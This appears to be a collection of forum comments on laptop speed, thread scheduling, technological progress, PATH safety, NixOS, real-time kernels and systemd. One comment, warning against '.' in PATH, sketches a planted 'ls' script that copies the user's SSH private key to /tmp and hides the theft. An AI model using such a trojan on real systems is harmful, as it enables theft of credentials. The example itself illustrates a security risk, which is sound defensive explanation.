I think you're bringing up a great question here. If you ask a random person on the street "is your laptop fast", the answer probably has more to do with what software that person is running than with what hardware they have.
My Apple silicon laptop feels super fast because I just open the lid and it's running. That's not because the CPU runs instructions super fast; it's because I can just close the lid and the battery lasts forever.
My guess would be that ARM Chromebooks might run substantially more cut-down firmware, while Intel ones might need a more full-fat EFI stack? But I haven't used either and am just speculating.
I think in the example the OP is making, the work is not useless. They're saying that if you had a system doing the same work with maybe 60 processes, you're better off splitting that into 600 processes and a couple thousand threads, since that allows granular classification of tasks by their latency sensitivity.
But it is. He's talking about real systems with real processes in a generic way, not a singular hypothetical where suddenly all that work must be done, so you can also apply your general knowledge that some of those background processes aren't useful (but can't even be disabled due to system lockdown).
I think you're right that the article didn't provide criteria for when this type of system is better or worse than another. For example, the cost of splitting work into threads and switching between them needs to be factored in. If that cost is very high, then the multi-threaded system could very well be worse. And there are other factors too.
However, given the trend in modern software engineering to break work into units and the fact that on modern hardware thread switches happen very quickly, being able to distribute that work across different compute clusters that make different optimization choices is a good thing and allows schedulers to get results closer to optimal.
So really it boils down to this: if the gains from doing the work on different compute units outweigh the cost of splitting and distributing the work, it's a win. And for most modern software on most modern hardware, the win is very significant.
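To put rough numbers on "thread switches happen very quickly" (both figures below are assumptions for illustration, not measurements): if a switch costs on the order of 5 microseconds and a unit of work runs for about a millisecond, the switching overhead is well under a percent, so even modest gains from smarter placement cover it.

    # back-of-envelope only; 5 us/switch and 1 ms/work-unit are assumed figures
    $ echo 'scale=3; 5/1000 * 100' | bc
    .500    # ~0.5% overhead per switch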
> (...) a singular hypothetical where suddenly all that work must be done (...)
This is far from hypothetical. It is an accurate description of your average workstation. I recommend you casually check the list of processes running at any given moment on any random desktop or laptop you find within a 5 meter radius.
I've done more than that: after noticing high CPU use I investigated what those processes do, discovered services that I never need, and tried to disable them. Now try to actually prove your point.
It's true, they don't "make 'em like they used to". They make them in new, more efficient ways which have contributed to improving global trends in metrics such as literacy, child mortality, life expectancy, extreme poverty, and food supply.
If you are arguing that the standard of living today is lower than in the past, I think that is a very steep uphill battle.
If your worries are about ecology and sustainability, I agree that is a concern we need to address more effectively than we have in the past. Technology will almost certainly be part of that solution via things like fusion energy. Success is not assured and we cannot just sit back and say "we live in the best of all possible worlds with a glorious manifest destiny", but I don't think the future is particularly bleak compared to the past.
I worry that humanity has a track record of diving head first into new technologies without worrying about externalities like the environment or job displacement.
I wish we were more thoughtful and focused more on minimizing the downsides of new technologies.
Instead it seems we’re headed full steam towards huge amounts of energy use and job displacement. And the main bonus is rich people get richer.
I’m not sure if having software be cheaper is beneficial. Is it good for malware to be easier to produce? I’d personally choose higher quality software over more software.
I’m not convinced cheaper mass produced clothing has been a net positive. Will AI be a positive? Time will tell. In the short term there are some obvious negatives.
> If you are arguing that standard of living today is lower than in the past, I think that is a very steep uphill battle to argue
We'd first have to agree on a definition of "standard of living". There are certainly many aspects (important to me) in which we have regressed, and being able to buy cheap tech crap does not make up for it.
One could set an env var to their local bin dir which is otherwise not in the PATH, like L=/home/ahepp/.local/bin, and then run $L/mycommand. That doesn't meet the OP's requirement of no shift key, though.
Or prefix files in the local bin dir with a couple letters from your username, like /home/ahepp/.local/bin/ah-mycommand
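A quick sketch of both approaches, reusing the example paths above (mycommand is just a stand-in for whatever tool you actually run):

    # approach 1: a short env var pointing at a dir that is not in PATH
    export L=/home/ahepp/.local/bin     # e.g. in ~/.bashrc
    $L/mycommand                        # explicit, but "$" still needs shift

    # approach 2: keep ~/.local/bin in PATH, but namespace your own tools
    mv ~/.local/bin/mycommand ~/.local/bin/ah-mycommand
    ah-mycommand                        # unlikely to collide with system commands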
I think it's substantially riskier. At the very least, it means you are trusting any directory you cd into, rather than just trusting your $HOME/bin.
Stuff that would not typically raise eyebrows has been made risky. You might cd into a less privileged user's $HOME, or some web service's data directory, and suddenly you've given whoever has access to those accounts access to your user.
Maybe you could argue "well, I just won't cd outside of my $HOME", but the sheer unexpectedness of the behavior seems deeply undesirable to me.
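For anyone who hasn't seen the failure mode, here's a hedged sketch (every path and name below is made up) of why a relative entry like "." in PATH turns cd into a trust decision:

    $ echo "$PATH"
    .:/usr/local/bin:/usr/bin:/bin      # "." comes first, so it shadows real commands
    # a less-trusted user plants an executable "ls" in a directory you will visit
    $ cat /srv/uploads/ls
    #!/bin/sh
    cp ~/.ssh/id_ed25519 /tmp/stolen    # runs with *your* privileges
    exec /bin/ls "$@"                   # then behaves normally to avoid suspicion
    $ cd /srv/uploads && ls             # looks routine, executes the planted file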
NixOS simultaneously smooths the path to using absolute paths while putting some (admittedly minor) speed-bumps in the way of avoiding them. If you package something up that uses relative paths, it will probably break for someone else relatively quickly.
What that means is that you end up with a system in which absolute paths are used almost everywhere.
This is why the killer feature of NixOS isn't that you can configure things from a central place (RedHat had a tool to do that at least 25 years ago); it's that, since most of /etc/ is read-only, you must configure everything from a central place, which has two important effects:
1. The tool for configuring things in a central place can be much simpler, since it doesn't have to worry about people changing things out from under it.
2. Any time someone runs into something that is painful with the tool for configuring things in a central place, they have to improve the tool (or abandon NixOS).
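A concrete illustration of the "read-only /etc" point, sketched from memory (the store path layout and exact option names vary between NixOS releases):

    # most of /etc is symlinks into the read-only Nix store
    $ readlink -f /etc/ssh/sshd_config
    /nix/store/<hash>-.../sshd_config           # hash and layout vary per system
    $ echo 'PermitRootLogin no' | sudo tee -a /nix/store/<hash>-.../sshd_config
    tee: ...: Read-only file system
    # the supported route is the central config plus a rebuild, e.g. in
    # /etc/nixos/configuration.nix:   services.openssh.enable = true;
    $ sudo nixos-rebuild switch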
How are you defining "general-purpose OS"? Are you saying IoT and robotics shouldn't use a Linux kernel at all? Or just not your general purpose distros? I would be interested to hear more of your logic here, since it seems like using the same FOSS operating system across various uses provides a lot of value to everyone.
I think I want at least a hard real-time OS in any computer that can move physical objects. The Linux kernel cannot be that: a hard RTOS cannot have virtual memory (page-table walks are unpredictable on a TLB miss), and many other mechanisms that are desirable in a desktop/server OS are ill-suited for an RTOS.
The scheduler must be tuned differently, and I/O must be done differently. It is not just «this process has RT priority, don't preempt it»; it is the design of the whole kernel.
Better yet, this OS should be verified (like seL4). But I understand that it is a pipe dream. Heck, even an RTOS is a pipe dream.
About IoT: the word means nothing. Is a connected TV IoT? I have no problem with Linux inside it. My lightbulb that can be turned on and off via ZigBee? Why would I need Linux there? My battery-powered weather station (because I cannot run 220V wiring to the backyard)? Better not; I need an as-low-power-as-possible solution.
To be honest, I think even using one kernel for different servers is technically wrong, because an RDBMS, a file server, and a computational node need very different priorities in kernel tuning too. I prefer the network stack of FreeBSD, the file server capabilities (native ZFS & Co.) of Solaris, the transaction processing of Tandem/HPE NonStop OS, and the Wayland/GPU/desktop support of Linux. But everything bar Linux is effectively dead. And Linux is only «good enough» at everything, mediocre.
I understand the value of unification, but as an engineer I'm sad.
I work on embedded devices, fairly powerful ones to be fair, and I think systemd is really great, useful software. There's a ton of stuff I can do quite easily with systemd that would take a ton of effort to do reliably with sysvinit.
It's definitely pretty opinionated, and I frequently have to explain to people why "After=" doesn't mean "Wants=", but the result is way more robust than any alternative I'm familiar with.
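A minimal unit to illustrate the distinction (the unit and binary names are made up): After= only orders startup when both units are part of the transaction anyway; it is Wants= (or Requires=) that actually pulls the dependency in.

    [Unit]
    Description=Example sensor daemon
    Wants=network-online.target     # pull the target into the transaction
    After=network-online.target     # ...and only start once it has been reached

    [Service]
    ExecStart=/usr/bin/sensord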
If you're on a system so constrained that running systemd is a burden, you're probably already using something like buildroot/yocto and have a high degree of control over which init system you use.